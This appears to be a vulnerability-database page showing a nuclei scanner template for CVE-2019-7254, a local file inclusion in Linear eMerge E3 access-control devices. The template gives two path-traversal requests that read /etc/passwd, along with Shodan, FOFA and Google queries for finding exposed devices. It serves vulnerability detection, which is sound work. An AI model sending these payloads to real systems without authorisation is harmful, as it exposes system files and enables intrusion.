Lucene search

K

eMerge E3 1.00-06 - Local File Inclusion

🗓️ 13 Jun 2021 10:02:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

eMerge E3 1.00-06 vulnerability - Unauthorized access to sensitive information, remote code execution

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
id: CVE-2019-7254

info:
  name: eMerge E3 1.00-06 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Linear eMerge E3-Series devices are vulnerable to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Apply the latest security patch or update to a non-vulnerable version of eMerge E3.
  reference:
    - https://www.exploit-db.com/exploits/47616
    - https://applied-risk.com/labs/advisories
    - https://www.applied-risk.com/resources/ar-2019-005
    - http://packetstormsecurity.com/files/155252/Linear-eMerge-E3-1.00-06-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7254
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-7254
    cwe-id: CWE-22
    epss-score: 0.85153
    epss-percentile: 0.9853
    cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: nortekcontrol
    product: linear_emerge_essential_firmware
    shodan-query: http.title:"emerge"
    fofa-query: title="emerge"
    google-query: intitle:"emerge"
  tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol

http:
  - method: GET
    path:
      - "{{BaseURL}}/?c=../../../../../../etc/passwd%00"
      - "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201b44f94cfb69d990ebc1cf7dd20f223061a75991d73c600ca96bf04fe9c990ad022100f4835eccd52e7451db0bee565f368dec54b7ad0fb07f191ed1eaa7758dbe8ec2:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Jun 2021 10:05Current
7.4High risk
Vulners AI Score7.4
CVSS25
CVSS37.5
EPSS0.85158
16
.json
Report